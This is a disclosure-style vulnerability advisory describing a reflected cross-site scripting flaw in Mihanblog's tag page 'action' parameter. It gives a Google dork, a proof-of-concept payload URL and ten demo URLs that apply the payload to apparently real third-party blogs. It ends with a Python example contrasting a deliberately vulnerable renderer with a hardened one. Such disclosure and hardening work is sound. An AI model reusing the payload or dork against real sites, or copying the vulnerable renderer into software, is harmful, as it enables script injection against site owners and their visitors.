Mihanblog cross-site scripting vulnerability

2017.10.21
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

[-] Exploit Title: Mihanblog cross-site scripting vulnerability
[-] Vendor Homepage: http://www.mihanblog.com/
[-] Google Dork: inurl:".mihanblog.com"
[-] Author: Milad Ahmadi
[-] Date: 2017-10-21
[-] Version: All
[-] Tested on: Windows 10
---------------------------------------------------------------------
[ Description ]
# The Mihanblog blogging system is a product of the Saba Idea company (www.sabaidea.com), which also created the Aparat, Filimo, Cloob and Lenzor services. This popular blogging CMS is vulnerable to cross-site scripting attacks on the tag page through the action parameter.
---------------------------------------------------------------------
[ Proof Of Concept ]
http://site.com/post/tag/[ tagname ]/page/[ page id ]?action=1"></script><script>alert(0)</script>
---------------------------------------------------------------------
[ Demo ]
http://mashhad.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://vizvizak.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://feda.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://borazjani.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://mohammad-erfan.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://doshman-1.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://dost-1.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://best--poems.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://sajadsport13841384.mihanblog.com/post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
http://30arg.mihanblog.com//post/tag/tagname/page/1?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E
---------------------------------------------------------------------
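The reflection of the action parameter described above, seen from the fixing side, as an added example that is not part of the original advisory and not Mihanblog's code. The template, the host blog.example, the function names and the assumption that action is a small integer are all hypothetical; the payload is the one from the proof of concept.

```python
import html
import json
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample request carrying the payload shape from the proof of concept.
SAMPLE_URL = ("http://blog.example/post/tag/tagname/page/1"
              "?action=1%22%3E%3C/script%3E%3Cscript%3Ealert(0)%3C/script%3E")

ACTION_RE = re.compile(r"[0-9]{1,4}")  # assumption: action is a small integer


def raw_action(url):
    """Return the URL-decoded action parameter, or '' if it is absent."""
    return parse_qs(urlsplit(url).query).get("action", [""])[0]


def render_vulnerable(action):
    # Hypothetical template: the value is copied verbatim into an
    # attribute and into a script block, so markup in it is parsed as markup.
    return ('<input type="hidden" name="action" value="' + action + '">'
            '<script>var action = "' + action + '";</script>')


def safe_action(action, default="1"):
    """Allow-list validation: anything but a short integer becomes the default."""
    return action if ACTION_RE.fullmatch(action) else default


def js_string(value):
    """Encode for a JavaScript string inside <script>: JSON, then escape <, >, &."""
    out = json.dumps(value)
    for ch in "<>&":
        out = out.replace(ch, "\\u%04x" % ord(ch))
    return out


def render_hardened(action, validate=True):
    if validate:
        action = safe_action(action)
    # Context-specific encoding is applied even after validation (defence in depth).
    return ('<input type="hidden" name="action" value="'
            + html.escape(action, quote=True) + '">'
            '<script>var action = ' + js_string(action) + ';</script>')


if __name__ == "__main__":
    value = raw_action(SAMPLE_URL)
    for page in (render_vulnerable(value), render_hardened(value),
                 render_hardened(value, validate=False)):
        print(page)
```

With validation switched off the hardened renderer still emits exactly one script element, which shows that the output encoding holds on its own if the allow-list is ever loosened.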



Copyright 2024, cxsecurity.com

 
